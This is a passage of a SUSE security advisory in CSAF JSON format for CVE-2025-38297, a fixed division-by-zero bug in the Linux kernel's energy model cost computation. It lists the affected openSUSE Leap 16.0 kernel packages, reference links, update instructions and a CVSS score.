"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: EM: Fix potential division-by-zero error in em_compute_costs()\n\nWhen the device is of a non-CPU type, table[i].performance won\u0027t be\ninitialized in the previous em_init_performance(), resulting in division\nby zero when calculating costs in em_compute_costs().\n\nSince the \u0027cost\u0027 algorithm is only used for EAS energy efficiency\ncalculations and is currently not utilized by other device drivers, we\nshould add the _is_cpu_device(dev) check to prevent this division-by-zero\nissue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38297",
"url": "https://www.suse.com/security/cve/CVE-2025-38297"
},
{
"category": "external",
"summary": "SUSE Bug 1253078 for CVE-2025-38297",
"url": "https://bugzilla.suse.com/1253078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
